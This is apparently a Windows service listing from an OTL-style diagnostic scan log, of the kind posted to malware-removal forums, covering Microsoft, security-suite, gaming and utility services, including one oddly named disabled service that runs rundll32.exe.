SRV:[b]64bit:[/b] - [2017/09/29 14:42:05 | 000,013,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:04 | 000,640,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vds.exe -- (vds)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:04 | 000,220,160 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:04 | 000,201,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wbem\WmiApSrv.exe -- (wmiApSrv)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:04 | 000,042,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\UI0Detect.exe -- (UI0Detect)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:03 | 002,843,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WsmSvc.dll -- (WinRM)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:03 | 001,011,200 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\termsrv.dll -- (TermService)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:03 | 000,213,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DiagSvc.dll -- (diagsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:01 | 000,302,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TieringEngineService.exe -- (TieringEngineService)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:01 | 000,167,936 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dps.dll -- (DPS)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:01 | 000,015,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\snmptrap.exe -- (SNMPTRAP)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:00 | 000,307,200 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:00 | 000,200,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TabSvc.dll -- (TabletInputService)
SRV:[b]64bit:[/b] - [2017/09/29 14:42:00 | 000,069,632 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 001,288,704 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\SensorDataService.exe -- (SensorDataService)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,207,872 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\sstpsvc.dll -- (SstpSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,073,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\Sens.dll -- (SENS)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:58 | 000,071,168 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysNative\rundll32.exe -- (Y2JkZGU5MDNkNDE5M)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\mprdim.dll -- (RemoteAccess)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,167,936 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\PrintWorkflowService.dll -- (PrintWorkflowUserSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:57 | 000,151,552 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\RMapi.dll -- (RmSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:56 | 000,275,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\qwave.dll -- (QWAVE)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:55 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:52 | 000,065,536 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:50 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AxInstSv.dll -- (AxInstSV)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:50 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:49 | 000,150,528 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\iscsiexe.dll -- (MSiSCSI)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,431,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,267,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lltdsvc.dll -- (lltdsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,201,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wecsvc.dll -- (Wecsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,108,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wercplsupport.dll -- (wercplsupport)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:47 | 000,020,992 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fdPHost.dll -- (fdPHost)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,613,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,610,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,081,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,034,816 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FDResPub.dll -- (FDResPub)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:45 | 000,027,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 001,117,184 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 001,117,184 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,486,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\defragsvc.dll -- (defragsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,407,040 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\wdi.dll -- (WdiSystemHost)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\wdi.dll -- (WdiServiceHost)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:44 | 000,085,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe -- (diagnosticshub.standardcollector.service)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,779,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FlightSettings.dll -- (wisvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,187,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wersvc.dll -- (WerSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,094,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,078,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\RpcEpMap.dll -- (RpcEptMapper)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,057,976 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\svchost.exe -- (WpnUserService_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\svchost.exe -- (UserDataSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\svchost.exe -- (UnistoreSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svchost.exe -- (PrintWorkflowUserSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\svchost.exe -- (PimIndexMaintenanceSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\svchost.exe -- (OneSyncSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svchost.exe -- (MessagingService_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svchost.exe -- (DevicesFlowUserSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,048,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\svchost.exe -- (CDPUserSvc_5547f)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lmhsvc.dll -- (lmhosts)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:43 | 000,020,888 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\dllhost.exe -- (COMSysApp)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,450,560 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,368,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msdtckrm.dll -- (KtmRm)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,146,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msdtc.exe -- (MSDTC)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,120,320 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appidsvc.dll -- (AppIDSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:41 | 000,010,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\Locator.exe -- (RpcLocator)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:38 | 000,696,320 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\DevicesFlowBroker.dll -- (DevicesFlowUserSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:38 | 000,194,560 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\Windows.SharedPC.AccountManager.dll -- (shpamsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:37 | 000,154,624 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\regsvc.dll -- (RemoteRegistry)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:35 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:35 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\umpnpmgr.dll -- (DeviceInstall)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:35 | 000,023,552 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 001,345,024 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dosvc.dll -- (DoSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,702,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\Windows.Internal.Management.dll -- (DmEnrollmentSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,456,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,181,760 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\bthserv.dll -- (bthserv)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,092,672 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:33 | 000,057,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\xboxgipsvc.dll -- (XboxGipSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 001,082,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ngcsvc.dll -- (NgcSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,533,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NgcCtnrSvc.dll -- (NgcCtnrSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,363,520 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,284,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wpnservice.dll -- (WpnService)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,086,016 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\moshost.dll -- (MapsBroker)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,072,704 | ---- | M] (Microsoft Corporation) [Auto | Unknown] -- C:\Windows\SysNative\WpnUserService.dll -- (WpnUserService)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,046,080 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lfsvc.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:31 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DevQueryBroker.dll -- (DevQueryBroker)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:30 | 000,561,152 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tileobjserver.dll -- (tiledatamodelsvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:28 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\Windows.WARP.JITService.dll -- (WarpJITSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:27 | 001,272,320 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\XblGameSave.dll -- (XblGameSave)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:27 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GraphicsPerfSvc.dll -- (GraphicsPerfSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:27 | 000,059,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\xbgmsvc.exe -- (xbgm)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:26 | 001,107,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\XblAuthManager.dll -- (XblAuthManager)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:26 | 000,696,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cdpsvc.dll -- (CDPSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:26 | 000,096,256 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\tzautoupdate.dll -- (tzautoupdate)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:26 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AJRouter.dll -- (AJRouter)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:25 | 001,143,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\XboxNetApiSvc.dll -- (XboxNetApiSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:25 | 000,456,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\upnphost.dll -- (upnphost)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:25 | 000,165,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\embeddedmodesvc.dll -- (embeddedmode)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:23 | 000,063,488 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipxlatcfg.dll -- (IpxlatCfgSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:23 | 000,052,224 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysNative\MessagingService.dll -- (MessagingService)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:19 | 000,355,304 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:19 | 000,105,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:18 | 000,465,408 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\provsvc.dll -- (HomeGroupProvider)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:17 | 000,082,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wpdbusenum.dll -- (WPDBusEnum)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:17 | 000,026,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\pnrpauto.dll -- (PNRPAutoReg)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:14 | 001,827,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:13 | 000,145,408 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:[b]64bit:[/b] - [2017/09/29 14:41:08 | 000,456,704 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2017/09/28 19:56:00 | 001,177,600 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)
SRV:[b]64bit:[/b] - [2017/05/18 07:25:40 | 000,310,496 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\afwServ.exe -- (avast! Firewall)
SRV:[b]64bit:[/b] - [2017/05/18 07:21:40 | 000,263,304 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:[b]64bit:[/b] - [2017/05/18 07:21:32 | 007,346,208 | ---- | M] (AVAST Software s.r.o.) [On_Demand | Stopped] -- C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe -- (aswbIDSAgent)
SRV:[b]64bit:[/b] - [2017/01/31 00:47:14 | 000,173,472 | ---- | M] (SUPERAntiSpyware.com) [Auto | Running] -- C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE -- (!SASCORE)
SRV:[b]64bit:[/b] - [2015/01/13 16:41:00 | 000,238,080 | ---- | M] (AMD) [Disabled | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV - [2018/12/29 17:49:25 | 000,156,968 | ---- | M] (Google Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe -- (gupdatem)
SRV - [2018/12/29 17:49:25 | 000,156,968 | ---- | M] (Google Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe -- (gupdate)
SRV - [2018/12/26 11:34:28 | 000,227,792 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2018/12/13 06:45:52 | 002,709,480 | ---- | M] (Adobe Systems, Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe -- (AGSService)
SRV - [2018/12/13 06:45:50 | 002,917,864 | ---- | M] (Adobe Systems, Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe -- (AGMService)
SRV - [2018/12/12 06:11:56 | 000,443,872 | ---- | M] (Google Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\elevation_service.exe -- (GoogleChromeElevationService)
SRV - [2018/12/05 21:29:14 | 000,335,872 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2018/11/26 21:29:32 | 001,684,256 | ---- | M] (Valve Corporation) [Disabled | Running] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2018/11/17 17:41:08 | 000,781,440 | ---- | M] (EasyAntiCheat Ltd) [On_Demand | Stopped] -- C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe -- (EasyAntiCheat)
SRV - [2018/10/17 15:24:18 | 007,252,656 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\BattlEye\BEService.exe -- (BEService)
SRV - [2018/09/10 16:53:33 | 011,644,656 | ---- | M] (TeamViewer GmbH) [Disabled | Stopped] -- C:\Users\Public\temp\TeamViewer\TeamViewer_Service.exe -- (TeamViewer)
SRV - [2018/06/11 19:57:04 | 000,009,728 | ---- | M] (Hi-Rez Studios) [Disabled | Paused] -- B:\Hi-Rez\HiPatchService.exe -- (HiPatchService)
SRV - [2018/03/30 05:23:56 | 000,566,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\CoreMessaging.dll -- (CoreMessagingRegistrar)
SRV - [2018/03/30 05:10:09 | 000,704,080 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\winhttp.dll -- (WinHttpAutoProxySvc)
SRV - [2018/03/30 04:40:49 | 000,071,680 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV - [2018/03/30 04:40:46 | 000,314,880 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV - [2018/03/30 04:38:47 | 000,966,656 | ---- | M] (Microsoft Corporation) [On_Demand | Unknown] -- C:\Windows\SysWOW64\Unistore.dll -- (UnistoreSvc)
SRV - [2018/03/30 04:34:32 | 000,339,456 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\SessEnv.dll -- (SessionEnv)
SRV - [2018/03/30 04:32:22 | 000,021,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\perfhost.exe -- (PerfHost)
SRV - [2018/03/26 12:55:44 | 000,502,144 | ---- | M] (Razer Inc.) [Disabled | Stopped] -- B:\Razer Cortex\RzKLService.exe -- (RzKLService)
SRV - [2018/03/13 07:51:24 | 002,896,896 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2018/03/13 05:27:43 | 000,190,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\WebClnt.dll -- (WebClient)
SRV - [2018/02/10 06:08:02 | 003,980,720 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\Windows.StateRepository.dll -- (StateRepository)
SRV - [2018/02/10 05:46:37 | 001,008,640 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\InstallService.dll -- (InstallService)
SRV - [2018/02/10 05:39:46 | 000,658,432 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\netlogon.dll -- (Netlogon)
SRV - [2018/02/10 05:36:38 | 000,915,968 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\TokenBroker.dll -- (TokenBroker)
SRV - [2018/02/10 05:35:34 | 000,826,880 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\WINDOWS\SysWow64\SearchIndexer.exe -- (WSearch)
SRV - [2018/02/02 18:57:33 | 000,735,584 | ---- | M] () [Auto | Stopped] -- B:\Onglet les dossiers\Clover\CloverSvc.dll -- (HCloverService)
SRV - [2018/01/25 17:00:50 | 000,206,096 | ---- | M] (IObit) [Auto | Running] -- C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe -- (IObitUnSvr)
SRV - [2018/01/23 18:45:58 | 002,994,248 | ---- | M] (NEXON Korea Corporation) [On_Demand | Stopped] -- C:\Windows\NGService.exe -- (NGS)
SRV - [2017/12/11 15:20:00 | 001,058,080 | ---- | M] (IObit) [Auto | Running] -- C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe -- (AdvancedSystemCareService11)
SRV - [2017/09/30 15:41:36 | 000,163,840 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\appmgmts.dll -- (AppMgmt)
SRV - [2017/09/29 14:42:25 | 000,252,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV - [2017/09/29 14:42:24 | 000,063,488 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\WINDOWS\SysWow64\rundll32.exe -- (Y2JkZGU5MDNkNDE5M)
